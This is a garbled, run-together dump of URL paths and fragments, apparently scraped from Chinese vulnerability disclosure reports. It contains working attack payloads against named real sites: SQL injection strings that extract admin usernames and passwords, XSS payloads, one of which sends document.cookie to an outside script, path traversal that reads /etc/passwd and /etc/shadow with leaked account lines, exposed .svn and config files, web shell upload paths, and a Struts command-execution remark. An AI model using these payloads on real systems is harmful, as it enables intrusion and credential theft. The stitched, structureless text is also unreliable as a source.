/api/get_attention_num.php?uid=2771953021%20and%20sleep%2820%29=%281%29&suid=0&attention=suid&userpointuid=2771953021&s=1&varname=requestId_24666181 /pub?next=javascript:alert%281%29 /article/index.action?sec=267&request_locale=en /pk/street.php?keyword=1 /List.aspx?type=4%22;alert('xss');alert(document.cookie);var%20ttt=%22 /origin/book/find/?w=&k=%c0%27,0 /t/artists_list.php?tabtype=tagstyle&tagid=7,对tagid过滤不严,奇怪就奇怪在需要在url添加一个没有value的get变量,比如下面这个url: /t/artists_list.php?tabtype=tagstyle&tagid=7&xss /CheckUserMobile.do?mobile=“你的手机号” /CheckUserMobile.do?mobile=“你的手机号” /Query/logon.aspx /demo.html /VECenter/GuoPeiHwView.aspx?StudentJobID=810112 / /GetEntry.do?id=869693728&owner=275231305 /page/include/jsp/download.jsp?fileUrl=E:\Program http://item.taobao.com/item.htm?id=16383379477&ali_trackid=2:mm_14507416_2297358_8935934:1349851191_3k8_459371199 /zWIp5gH /?m=51mdq&a=A100124176&l=99999&l_cd1=0&l_cd2=1&tu=http%3A%2F%2Fwww.coo8.com /ajaxUserProfile_leaveword.php?customer_id=55586%27%20and%20%271%27=%271 /ajaxUserProfile_leaveword.php?customer_id=55586%27%20and%20%271%27=%272 /iPG/T-nsp/VodPlay.do?svstype=packd&pmId=0&mainPmId=179***&userId=16669*** /x.jpg\ 16.0 /event/44691 /accept.aspx?id=@pid&location='+escape(document.location)+'&toplocation='+escape(top.document.location)+'&cookie='+escape(document.cookie)+'&opener='+escape(myopener) /samshuai tmxk.Org/0.js none /question/12_72706 /question/565065_57506 /question/12_72706 http://www.oschina.net/question/100267_65116 /article/2007/0905/A20070905810709.shtml /u/254689/blog/53005 /xss-test-oschina-a-friendship.html /system/config/database.php_bak /category/1 /account/ajax/login_process/ /.svn/entries /app/.svn/entries /static/.svn/entries /models/.svn/entries /install/.svn/entries /system/.svn/entries /views/.svn/entries /app/account/ajax.php /app/account/find_password.php /app/account/main.php /app/account/openid.php /app/account/qq.php /app/account/setting.php /help/toHelpinfo.action存在struts任意代码执行漏洞 www.a.shifen.com www.a.shifen.com /people/296?notification_id-45654 / /api.php?action=File&ctrl=download&path=config.php /web_pub_cps_info.php?id=21 /file/download/?file_name=Y29uZmlnLnBocA==&url=Lmh0dHA6Ly93ZW5kYS5hbndzaW9uLmNvbS91cGxvYWRzLi9zeXN0ZW0vY29uZmlnL2RhdGFiYXNlLnBocA== /ddedu/download/software/ /ddedu/usereg/ddedu_user_reg2.jsp.nai /services / /bae /ddedu/upload/4/temp/aa.jsp /search?key=A / /Search.action /forum/editSubject/ajaxEditSubject /forum/editSubject/ajaxEditSubject www.sheca.com首页的快速通道有两个链接“证书查询和下载”和“下载专区 /service/generalDriver/ZSGLQ1108.rar,该安装包有三个驱动,随便安装一个即可。注意不要安装最新的“证书助手安装包”,会报找不到设备的错误。此外下载的页面还需要安装一个ActiveX控件。 /login.php/ PageData.power.forever_ban=1;void /rtx/download/index.shtml /userlist.php /c0bin6svn5 /file/MDAwMDAwMDGVZLAsSFvlxN7r61IlfbntP-sMSyg4FNnso387Qn0kDQ../b35c618428cb868816446c67ca79eff462d47a6/r00ts%E6%8A%80%E6%9C%AF%E5%B0%8F%E7%BB%84%E5%86%85%E9%83%A8%E5%B7%A5%E5%85%B7%E5%8C%85.rar?key=AAABQFB6H9H9sGX6&p=&a=10338190-3aa82f84&mode=download /file/MDAwMDAwMDGVZLAsSFvlxN7r61IlfbntP-sMSyg4FNnso387Qn0kDQ../b35c618428cb868816446c67ca79eff462d47a6 /file/MDAwMDAwMDGVZLAsSFvlxN7r61IlfbntP-sMSyg4FNnso387Qn0kDQ../b35c618428cb868816446c67ca79eff462d47a6/r00ts技术小组内部工具包.rar?key=AAABQFB6H9H9sGX6&p=&a=10338190-3aa82f84&mode=download /login.action /login.do?method=login /app/www/templates/paiba/js/topic.js中,暴露了加精置顶之类的具体操作。 /apps/paibaInfo.php /apps/paibaInfo.php 100% 500px 0px 0px z-index:1000 absolute alpha(opacity=0) /NAVIERR.HTM#500#javascript:alert(location);x=window.open('res://c:%255cprogra~1%255c360%255c360se%255cpages%255cpages.dll/NAVIERR.HTM%23500%23https://www.google.com');x.document.write www.ectrustprc.org.cn /newsShow.php?id=1297836243 /newsShow.php?id=1297836243%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10 /newsShow.php?id=1297836243%20and%201=2%20UNION%20SELECT%201,database%28%29,3,4,5,6,7,8,9,10 /newsShow.php?id=1297836243%20and%201=2%20UNION%20SELECT%201,2,3,4,5,concat%28GROUP_CONCAT%28DISTINCT%20table_name%29%29,7,8,9,10%20from%20information_schema.tables%20where%20table_schema=0x65637472757374 /newsShow.php?id=1297836243%20and%201=2%20UNION%20SELECT%201,name,3,4,5,password,7,8,9,10%20from%20admin_u /wap/more.php?file=company&newtypeid=25 /config.php.bak /admin.do /web/device/login?lang=1返回的信息可以判断出是H3C的web端 //,截图如下: /chinese-government-website-taken-down-database-leaked-by-venomsec/ /?q=joinus/view&id=94 /help/css/.svn/entries /help/.svn/entries /.svn/entries /web/album/.svn/entries /.svn/entries /.svn/entries /web/album/.svn/entries /vehicleweb/businessSite_QryAct.do?action=newQuery&dwdm=52010000 /news_show.php?id=18 /iframe_brief.php?style_id=103301880 / /caches/caches_yp/uptemplate/phpspy.php void(0) /kkotowicz/advanced-chrome-extension-exploitation) /UClick?gs=cmuclick&ad=1&location=xx /thread-tid-8226498.html /joao-paulo-campello/path-traversal-on-polycom-web-management-interface.html /joao-paulo-campello/polycom-web-management-interface-os-command-injection.html /bbs/ /home/explore/category-3%22%3E%3Ciframe%20src=//www.baidu.com%3E /home/explore/page-5__sort_type-hot__category-3_%22%3E%3Ciframe%20onload=alert(/xss/)%3E-1 /search/q-MTwvdGl0bGU+MTxTY1JpUHQgPmFsZXJ0KC94c3MvKTwvU2NSaVB0Pg==#all /?q= /?act=login password=password&referer= /sql/install/database.sql /i/?act=getentry&page[]=1 /.svn/entries /admin/.svn/entries /index.php?s=/Index/notice/id/1 /index.php?s=/Index/notice/id/1 /index.php?s=/Index/notice/id/1 /index.php?s=/Index/notice/id/1%20union%20select%201,2,3,4,5,6,7,8,9,10,11%20from%20ts_act_admin /index.php?s=/Index/notice/id/1%20union%20select%201,2,3,4,5,6,7,8,9,10,11%20from%20ts_lwds_user /app/search?kw=%c0%27//%28%000000%0deval /xss.js?'+Math.random();d.body.appendChild(e) /images/v2/360se/2011/appicons/1/LoginAssis.png;downurl=http://127.0.0.1/360.zip /images/v2/360se/2011/appicons/1/LoginAssis.png;downurl=http://127.0.0.1/360.zip /images/v2/360se/2011/appicons/1/LoginAssis.png;downurl=http://127.0.0.1/360.zip /images/v2/360se/2011/appicons/1/LoginAssis.png;downurl=http://127.0.0.1/361.zip /201008/opel/deta.php?id=398868 /x。 /forum.php?mod=image&aid=70972&size=300x300&key=71f977c9884b819c817549937059c0bd&nocache=yes&type=fixnone /v_show/id_XNDU5NjYwMjEy.html#?abc= /beian/user/registeraction.action /201006/xals/e2.php?id=333158 /201006/xals/e2.php?id=333158 alert(1)//,发送私信。 /qqring_new/xml_friend_list.php /zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat /zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1-- / /console /content/catchInfo/getCatchInfo.action /my/letter_inner_ajax.php?mid=111 /my/letter_inner_ajax.php?mid=111 /my/letter_inner_ajax.php?mid=111%29%20xxx&op=delete_message /my/letter_inner_ajax.php?mid=111 /my/letter_inner_ajax.php?mid=111 /main.php?do=route_ajax_new&date=&flag=2&cache=0.44604623204620797&route_id=76041 /index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php /post/brute-crack-youku-accounts.html /post/brute-crack-youku-accounts-new.html /smartphone/login / / /uploads/allimg/121018/118_121018121325_1_lit.png /ddcms/login.php /ddcmss/login.php /www/mb/js/mi_121016.js /mblogpic/4955e75656b3d175296c/460#"><img none"><i /mblogpic/4955e75656b3d175296c/460#"><img none"><i /mblogpic/4955e75656b3d175296c/460#"><img none"><i /inbox/pm_mgr.php /mblogpic/4955e75656b3d175296c/460 none /bossweb/support/js/common.js /beta2/simple_admin/flogin.html /beta2/simple_admin/ /beta2/simple_admin/js/index.js /beta2/simple_admin/js/forumList.js /resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml / /login/toLogin.action地址发现,该网站存在struts命令执行漏洞,进入服务器后发现当前系统账号是root,通过相关配置文件可以进入数据库,目测该站同时存在管理员弱口令漏洞,安全意识需要加强。 /1037792196/main?mode=gfp_timeline /search?key=%3C/title%3Etest%3Cscript%3Ealert(/xss/)%3C/script%3E xsser.me/xxxxx /client/cguest?frienduin=10001 /client/cguest?frienduin=带有XSS的QQ号码, /order/getFreight.action?rt=0.11502742627635598 / / /resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml /resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml /resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp / //resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml //resin-doc/examples/ioc-periodictask/viewfile?file=admin/mbean.jsp /resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml /resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp /search?key=s;加“;”即出错,暴漏出内网地址。 /search?key=%2A%2F%2D%2D%3E%27%22%29%3B%3E%3C%2Fiframe%3E%3C%2Fscript%3E%3C%2Fstyle%3E%3C%2Ftitle%3E%3C%2Ftextarea%3E%3Ciframe%20src%3Dhttp%3A%2F%2Fwww%2Ebaidu%2Ecom%2Ecn%3E /hd/lol/index.php?m=Gameapply /5107.tar.gz /myspace.php /data\attachment\album\201210\19\164257p1p8qpyutxcua929.jpg/x.php /hivws/getShortBlogArticles.action?callback=?callback=发现。 /shangpin/s?wd=%d5\";alert(1);// /account/register!toReg.action?invitorCode=f366327df4fd052b4fe9854405bf5046 /Cooperation/haiwei/BookList.asp?Category=1 /Cooperation/haiwei/orderbook.asp?MainProductID=3463 /list.aspx?id=XXX /list/search/?category=160 /list/?key=&CategoryID=1 /selectcourse/recommDetail.shtm?edusubjectid=396&courseeduid=53 /?q=school/happydetail&id=29 /detail.php?id=44 /index.php?q=photo/index/detail&photoid=4012 /index.php?do=module&act=view&id=xxx /ajaxdo.php?module=attendbug&id=13620 /god/m/js/bbs.zh-cn.js D27CDB6E-AE6D-11cf-96B8-444553540000 /pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0 /go/getflashplayer /go/getflashplayer http://www.1.com/1.swf"><img/src="1"onerror="alert none;"><i/a="#.swf,width:480,height:320 /god/images/space.gif /1.swf"><img/src="1"onerror="alert(document.cookie);"style="display:none;"><i/a="#.swf /admin/manage.jsp / /?act=u_itemlist&queryinput=1 /uwc/cae/active.action?username= /uwc/testxx.jsp /interface/yulan.q?url=http://www.baidu.com /Login.aspx?ReturnUrl=%2fDefault.aspx /static/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg_1209/newspaper_10.html /static/newspaper_..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fhosts%2500.jpg/newspaper_10.html /ndvs/ /ndvs/dataPSW.js /index.php?q=mobile/product/detail&name=finder%27%20aNd%20 /bluesword/blue_sword.php?t=t_upload&Action=PostMsg /winners_detail.php?luckydate={SQL https://www.soopay.net/mymoney/login.do www.soopay.net /t4/webim/js/webim.js?v=683ba479e29b6483 /maxsize.191/data.vdisk.me/29995023/6477c6794eecaca3f31c125f7b16b1cad56af0ea?ip=1350836400,172.16.105.125&ssig=reE%2BtbnAoV&Expires=1350835200&KID=sae,l30zoo1wmz&source=209678993 /t4/appstyle/webim/images/file.gif /2/mss/msget?source=209678993&fid=176029019 /linkMe2.do /server-status /identity/.svn/entries /server-status /resin-doc/ gov.cn gov.cn gov.cn gov.cn /a/k?tcca=c3l**G9u**AwNzc=&urip=294**68**8&orlu=aHR0cDo******iYWlkdS5jb20=&spid=20**102***&area=1*6&tcca=c3l****9uZzAwNzc=&ktype=0&kwid=0&wtype=80&wsid=3** ?ts=1350798318..Content-Length ybXGwMnOwcT:i[INwcHmic36qcnd /a/p?adid=2***84&tcca=c3lfZ***ZzAwNzc=&urip=29470***94&orlu=aHR0cD***3d3dy5iYW***S5jb20=&spid=409***5190&area=146&ts=1350799***&pushFlag=0 /thread-418967-1-1.html /sanlixop/地址 /old/publish.php /qzone/space_item/pre/13/82717_1.png /12049976.wma /?q=user%2Fauthordetail&author=--%3E%27%22%3E%3CH1%3Ewooyun%3C%2FH1%3E /index.php?q=index%2Flist&style=0&page=--%3E%27%22%3E%3CH1%3Ewooyun%3C%2FH1%3E /index.php?q=--%3E%27%22%3E%3CH1%3Ewooyun%3C%2FH1%3E /sysadmin/htm/?q=user%2Flogin&back=--%3E%27%22%3E%3CH1%3Ewooyun%3C%2FH1%3E /find3findmore.tar /sysadmin/htm/fckeditor/editor/filemanager/connectors/test.html /info.php /inbox/pm_list.php /inbox/pm_conversation.php?account=xxx / /dbdata.sql /manager/html /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html /qzone/newblog/v5/script/common.js /qzone/newblog/v5/script/common.js inline-block hidden baseline /get/flashplayer/current/swflash.cab#version=8,0,0,0 D27CDB6E-AE6D-11cf-96B8-444553540000 /22222222222.swf /1 /22222222222.swf /music/musicbox_v2_1/img/MusicFlash.swf qzs.qq.com swf /qzone/mall/app/vip_reward/201110/swf/play.swf?flashInit=function(){alert(document.cookie) /get/flashplayer/current/swflash.cab#version=8,0,0,0 D27CDB6E-AE6D-11cf-96B8-444553540000 /qzone/mall/app/vip_reward/201110/swf/play.swf?flashInit=function(){alert(document.cookie) /1 /qzone/mall/app/vip_reward/201110/swf/play.swf?flashInit=function(){alert(document.cookie) /music/musicbox_v2_1/img/MusicFlash.swf /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html admin /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html /service/down-search.aspx /login.jsp /xxoo.txt /diy/ /update/20090320/admin.php /job/index.php?key=%5c&page=1 /photo/index.php/%22%3e%3cscript%3ealert(9900)%3c/script%3e /job/index.php?page=1 /base/install/ /newsinfo.aspx?nid=53 /messageview.php?id=323 /investigationView.aspx?PID=10 /files/search.php?language=1%20and%201=2%20union%20select%201,user(),database(),version(),5,6,7,8,9,10,11,12,13,14,15-- /down.php?aid=109910 /admin/ /admin/photo.asp /basic/addrbook.php?gid=0%22%3E%3Cscript%3Ealert%28/xsssssssssss/%29%3C/script%3E%3C!-- m.taobao.com/somepage?sid=xxxx到hacker.com,那么hacker.com的访问记录里就可以看到如下的http /somepage?sid=xxxx / /static-content?contentPath=/../../../../../../etc/passwd x:0:0:root:/root:/bin/bash x:1:1:bin:/bin:/sbin/nologin x:2:2:daemon:/sbin:/sbin/nologin x:3:4:adm:/var/adm:/sbin/nologin x:4:7:lp:/var/spool/lpd:/sbin/nologin x:5:0:sync:/sbin:/bin/sync x:6:0:shutdown:/sbin:/sbin/shutdown x:7:0:halt:/sbin:/sbin/halt x:8:12:mail:/var/spool/mail:/sbin/nologin x:9:13:news:/etc/news x:10:14:uucp:/var/spool/uucp:/sbin/nologin x:11:0:operator:/root:/sbin/nologin x:12:100:games:/usr/games:/sbin/nologin x:13:30:gopher:/var/gopher:/sbin/nologin x:14:50:FTP /var/ftp:/sbin/nologin x:99:99:Nobody:/:/sbin/nologin x:28:28:NSCD /:/sbin/nologin x:69:69:virtual /dev:/sbin/nologin x:27:27:MySQL /var/lib/mysql:/bin/bash x:77:77::/var/arpwatch:/sbin/nologin x:81:81:System /:/sbin/nologin x:70:70:Avahi /:/sbin/nologin x:32:32:Portmapper /:/sbin/nologin x:47:47::/var/spool/mqueue:/sbin/nologin x:51:51::/var/spool/mqueue:/sbin/nologin x:16:16:Special /home/oprofile:/sbin/nologin x:74:74:Privilege-separated /var/empty/sshd:/sbin/nologin x:29:29:RPC /var/lib/nfs:/sbin/nologin x:65534:65534:Anonymous /var/lib/nfs:/sbin/nologin x:43:43:X /etc/X11/fs:/sbin/nologin x:68:68:HAL /:/sbin/nologin x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin x:48:48:Apache:/var/www:/sbin/nologin x:500:500::/home/tomcat:/bin/bash /static-content?contentPath=/../../../../../../etc/shadow 15419:0:99999:7 /zhaopin/regist/regist_maininfoInput.do?operflag=update&seqcode=4740 /PlatForm/SearchCenter/PersonalInfo.aspx?code=1068958 /MoreChildMenuServlet?code=003001001 /index.php?m=Guestbook&a=index&id=19 /admin/InfoInput/FormInfo/ShowForm1.aspx?typenumber=0101 www.xxx.com/cms/editor/filemanager/browser/default/browser.html?Type=&Connector=connectors/jsp/connector /cms/editor/filemanager/browser/default/browser.html?Type=../../../../Tomcat5.5_Gpower/webapps/cms&Connector=connectors/jsp/connector /s?word=%BA%A3%D4%F4%CD%F5&id=C2555&site=tudou.com&f=0&n=1&url=javascript:alert(document.domain);%22%20x=%22 /manager/ /gd_vblog/menu.action?format=json&tag=0&menuId=1 16.0 /tours/311094 /web/phone/common/find_pwd.jsp?account=手机号&source=51you /main.php /login.php /.svn/entries /.svn/text-base/login.php.svn-base /.svn/text-base/index.php.svn-base / / / /login_init.do void /tb/static-album/lib/bdtbmarklet.js?r='+Math.random()*99999999 /liantong namespace namespace /example/1-1.php?page= namespace /jackmasa /product.php?search="id= namespace /booklib/ProductList.asp?Category=267 /EngNews/News_Pra1.asp?NewsID=1764 /service/ask_v2.shtml?sid=1&cm=bank&aid=vip.pingtai.pay.index.qqvip /cgi-bin/askforgift/payask.cgi?outputjson=true&service_type=LTMCLUB¬e= /cgi-bin/askforgift/payask.cgi?outputjson=true&service_type=LTMCLUB¬e=x'&uin=自己的Q号&month=3&askeduin=好友的Q号 /cgi-bin/askforgift/payask.cgi?outputjson=true&service_type=LTMCLUB¬e=x''&uin=自己的Q号&month=3&askeduin=好友的Q号 /subcategory.php?scid=57 /nmds/stationOwnership!getSelectedStation.action /about/guest.html /linjunjie/01/ /file.php?filename=../../../../etc/passwd /EngNews/NewsUpLoad.asp / /upload/get-SN10086-Users.zip /uc/data/tmp/DVS.php?i1=shi1&i2=329 /upload/quali/b26f415b83c2c13a9d0837b5.jsp /user/addQuali.html %61%6c%65%72%74%28%27%68%61%68%61%20%67%75%6f%6b%72%20%78%73%73%27%29]http://1.1[/url /cheguansuo/homePage.action /wo/profile/的所在地可以构造XSS。 /campus.xhtml注册一个账户后可以填写求职简历,如果想增大hr的浏览概率就认真填写吧。其中涉及到资料填写的地方都未能过滤敏感字符,比如在填写在校奖励时加入 /cgi-bin/nw/focus.cgi?id=376 /index.php?q=mobile/product/detail&name=finder /?q=user/authordetail&author=1 //?act=u_example_more&itemid=862 /index.php?q=mobile/product/detail&name=finder /?q=user/authordetail&author=1 /index.php?q=admin/main/index/index //?act=u_example_more&itemid=862 //?act=u_example_more&itemid=862 ecbbs.ceair.com/1.php / /nc.aspx?Axon_key=ebca009a6f71a0d5eeee46fa7bd8eced&JumpUrl=0&id=2562388 localhost::localhost %::% /ques.zip /ques/ /ques/ThinkPHP/ThinkPHP.php /emall/LogonForm?storeId=10052&catalogId=10051&URL=http%3A%2F%2Fonline.suning.com%3A80%2Fwebchat%2Findex.jsp%3FtabId%3D--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E /.viminfo /.viminfo /skypebuy/?c=detail&productid=great_1m_unlimited_yn_euand /p/1947965617 /about.php?tid=27416573 /Goods/allcomment_616513.shtml/abc-abc-abc-$%7B@print /pptuan/10-0-1-0.shtml/abc/abc/abc/$%7B@print /css/templatecss/global.css/seay.php /json/show_buyer_list.htm?bid_page=1&item_type=b&item_id=AAAA&user_tag=BBBB&old_quantity=99999&zhichong=true&sold_total_num=16&seller_num_id=XXXXXXXXX&dk=0&callback=TShop.mods.DealRecord.reload&starts=1351000659000&ends=1351432659000&page_size=15 /interaction/lh_gy_content.php?coid=3&fromid=&nid=-20084 / /images/red/ /images/red/top1.jpg通过PUT /?c=user&a=message#write /shop/shopuser/myorder!queryDetail.action /f/search/ures?ie=utf-8&un=目标ID&from=prin /f/search/ures?ie=utf-8&un=%D2%BB%BD%E9p%B7%F2&from=prin /cgi-bin/nw/focus.cgi?id=169%20and%201=2%20union%20select%201,user() /cgi-bin/nw/focus.cgi?id=169%20and%201=2%20union%20select%201,database() /cgi-bin/nw/focus.cgi?id=169%20and%201=2%20union%20select%201,version() /intro.php?id=1271页面 /551651.html /static/.svn/entries /static/editor/uploads/.svn/entries /static/system/images/.svn/entries /static/editor/php/file_manager_json.php /crossdomain.xml /static/admin/images/logo.gif/1.php /lianbo/images/ipad/1.png/1.php /static/favicon.ico/1.php http://xianguo.com/book/shelf?beingsId=1378271&tagId=21818(须登录) tagId /download.action /postmail/actionBack/selectSubCate.action?email=wangwl@csair.com&subid=subid /snda_market_0.2/detail.php?id=2304%20and%201=2%20union%20select%201,2,user%28%29,4,database%28%29,version%28%29,7,8,@@basedir,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,@@datadir,29,30-- /phpmyadmin/ /wa.php?a=update_setting&ListNum=20&forword_mode=3&signtext=%3CDIV%3E%26nbsp%3B%3CBR%3E%3C%2FDIV%3E&AddAddr=1&AddOut=1&ReplyInc=0&ReSubLang=CHE&autore=0&autofo=1&forwordemail=test@xss.com&ShowMailSize=0&normalSign=0&vcardSign=0&weiboSign=0&autoreic=0&weibonotify=0&autoretext=&token=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /tags.php?/a / /show/product/plist.shtml?maintype=%E6%9C%BA%E6%A2%B0%E8%AE%BE%E5%A4%87&page=1&subtype=%E7%94%B5%E5%B7%A5%E7%94%B5%E5%99%A8%E6%88%90%E5%A5%97%E8%AE%BE%E5%A4%87&type=1 /com/admin/index.shtml / /emba/index.html / /Index/zhshow2?id=-1867%20UNION%20ALL%20SELECT%20NULL,user(),NULL,NULL,NULL,NULL,NULL /www/main/contact/.svn/entries /www/project/.svn/entries /1.asp www.lndangan.gov.cn/lndaj_asp/zwxx/ /show/search/searchlist.shtml?keyword=d /show/search/searchlist.shtml?keyword=d%25%27%20and%201=1%20and%20%27%25%27=%27 /show/search/searchlist.shtml?keyword=d%25%27%20and%201=2%20and%20%27%25%27=%27 /show/search/searchlist.shtml?keyword=dd /show/userinfo/selectuserinfo.shtml?describe=a%27 /show/userinfo/selectuserinfo.shtml?index=100&size=10&describe=a /show/userinfo/selectuserinfo.shtml?index=100&size=10&describe=a%25%27%20and%20%27%25%27=%27 /show/userinfo/selectuserinfo.shtml?index=100&size=10&describe=a%25%27%20and%201=2%20and%20%27%25%27=%27 /show/product/plist.shtml?maintype=a&subtype=b&thirdtype=c&page=1&type=1 /show/product/plist.shtml?maintype=%E6%9C%BA%E6%A2%B0%E8%AE%BE%E5%A4%87&subtype=%E7%BA%B8%E5%8A%A0%E5%B7%A5%E6%9C%BA%E6%A2%B0&thirdtype=%E6%8A%98%E9%A1%B5%E6%9C%BA'&page=1&type=1 /show/product/plist.shtml?maintype=%E4%BA%A4%E9%80%9A%E8%BF%90%E8%BE%93&subtype=%E9%9D%9E%E6%9C%BA%E5%8A%A8%E8%BD%A6&thirdtype=%E5%85%B6%E4%BB%96%E9%9D%9E%E6%9C%BA%E5%8A%A8%E8%BD%A6&page=1&type=1 /show/product/plist.shtml?maintype=%E5%B7%A5%E8%89%BA%E7%A4%BC%E5%93%81'&subtype=%E4%BC%A0%E7%BB%9F%E5%B7%A5%E8%89%BA%E5%93%81&thirdtype=%E6%A0%B9%E9%9B%95&page=1&type=1 /show/product/plist.shtml?maintype=%E6%9C%8D%E9%A5%B0'&subtype=%E7%AE%B1%E5%8C%85&thirdtype=%E7%94%B5%E8%84%91%E5%8C%85&page=1&type=1 /show/product/plist.shtml?maintype=%E5%BB%BA%E7%AD%91%E5%BB%BA%E6%9D%90&subtype=%E5%BB%BA%E7%AD%91%E3%80%81%E5%BB%BA%E6%9D%90%E7%B1%BB%E7%AE%A1%E6%9D%90&thirdtype=PP%E7%AE%A1&page=1&type=1 /show/product/plist.shtml?maintype=%E6%A0%91%E8%84%82&subtype=%E9%80%9A%E7%94%A8%E5%8E%9F%E6%96%99&thirdtype=PP&page=1&type=1 /search-project/cc=-1&im=-1&bf=1&bt=-1&show=list&pageNo=1&sort=investmentAmountSetId&order=desc /search-project/cc=-1&im=-1&bf=1&bt=-1&show=list&pageNo=1&sort=investmentAmountSetId&order=,name%20desc /search-project/cc=-1&im=-1&bf=1&bt=-1&show=list&pageNo=1&sort=investmentAmountSetId&order=,if%28%28true%29,id,name%29%20desc /saaselect.action?show=list&sort=name&order=desc,if%28%28false%29,1,2%29%20desc /Index/index /Index/introduce?id=20 /Index/active2?id=23 /Index/sj?id=39 / /) /) /login-share/tomlogin/login.action Ethernet 172.24.205.15 172.24.205.255 255.255.255.0 MTU:1500 packets:81041 txqueuelen:1000 f8000000-f8012800 /newscontent.php?pid=41 /i/control/checkPassword?newpassword=密码&confirmPassword=密码&uid=用户id。只需要遍历id就可以随意更改别人密码,而且id还是五位的数字。 /hiwebcms/system/USER/ /hiwebcms/system/sysSetup/filesManage.htm /hiwebcms/system/sysSetup/sysSetup.htm /hiwebcms/system/USER/userConfig.htm /interface.php /security/vulnerabilities_22.html /archives/fulldisclosure/2011-08/att-0203/killapache.pl /admin/User/UserAdd.aspx /list.php?id=499 /list.php?id=680 /caches/configs/database.php /caches/configs/system.php www.baidu.com后添加至主屏幕,主屏幕中添加了百度的应用 /site_ads_show.php?id=83&cType=&cityId=5 /site_ads_show.php?id=83&cType=&cityId=5 08e376701e790f04:localhost pma_DhtLYkFECwdu:5d4b619e2d58ba5d:localhost 73c1ec84153efe54:localhost 30cbb26929889d33:localhost 14ac2cc36e9856b1:localhost 14ac2cc36e9856b1:localhost 14ac2cc36e9856b1:localhost 76fe3dcc295814a5:localhost /info/locoy2050.php /event/img/tuzi1029.jpg/1111.php /cgi-bin/team/show.cgi?id=533 /im5/login/login.action /upload/fxScanner.zip /default/detail/index?files_id=6317 /Index/zhshow2?id=18 /Index/zhshow2?id=18 /admin/do.php www.25union.com只是开设的一个非法小联盟,里面全是色情网站,利用这些网站群 /m_second.php?id=41 /index.html登录界面点击忘记密码,输入真实的邮箱。 /onlineproblem.html /cgi-bin/oauth2/authorize?client_id=801166744&redirect_uri=http://www.wooyun.org&response_type=code /?code=0d3c9101440f53fbd12c791841ea6***&openid=8487834F089CE2145F4E47C76F2C6***&openkey=3C761BB9238101E1AABBD83C09037*** /login.action /checkLogin.action /login.action /checkLogin.action /submit/activate.php?user=XXXXXFxLmNvbQ==&code=MTM1MTczOTkwNg== /submit/resetpass.php?user=XXXXXFxLmNvbQ==&pass=MTM1MTc0MTY4OA== /actdo.php?action=sms&do=sendcontact&corpid=245&whitehatid=xxx /story-2800-p-1.html /story_detail.php?id=2800%20and%203=8%20union%20select%201,2,3,`schema_name`,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20(select%20`schema_name`%20from%20`information_schema`.`schemata`%20limit%2012,1)%20t%20-- /news_detail.php?id=37056 /magazine_list.php?id=375 /magazine.php?id=2590 /famous_magazine_detail.php?id=364 /columns/columns_detail.php?id=2489 /video.php?id=133 /mw/login /mw/login /WEB-INF/web.xml /WEB-INF/web.xml /WEB-INF/web.xml / / /WEB-INF/web.xml /WEB-INF/web.xml /WEB-INF/web.xml /WEB-INF/web.xml /WEB-INF/web.xml /WEB-INF/web.xml /WEB-INF/web.xml /WEB-INF/web.xml /WEB-INF/web.xml /images/common/uploadpic/20/13515781202937.jpg/1.phpssasssss weibo.cn/?gsid=3_5xxxx,这就使得只要该页面存在外链(即使通过301/302跳转),外链的目标服务器就可以从Referer得到gsid。 /xxxxx的跳转,此时跳转后的页面如下图(中)所示。用户点击“手机版”后会跳转到目标服务器,从而留下Referer /wiki/Samy_(XSS) / / /user/message_mgr.do?m=init /witkey alert() /21719892 /login bbsadmin /hr/admin/login.php /search/song?key=;%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C /search/album?key=;%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C www.xiami.com/web/下,是WAP站点,登陆后个人签名处、评论处,意见反馈处均存在存储型跨站,意见反馈处随意盲打后台。 / www.tpstar.net /login.do stylesheet xsl="http://www.w3.org/1999/XSL/Transform template template stylesheet /member/findPass.do www.53kf.com开放端口10003(10003/tcp /fanyi/add#2 /zhidao/pic/item/xxxxxxxxx.jpg /url/test.js /url/test.js /app/enter?appid=280383 /v2/api/?getapi&class=login&tpl=lo /v2/api/?getapi&class=login&tpl=lo http://www.tyzq.com.cn/pages/2news/news_show.action?category=zqscxgyw&guid={6EA7CEEF-89F7-4C57-BB41-EE0E47A70E94 /AboutUs/NewsLook.php?id=21 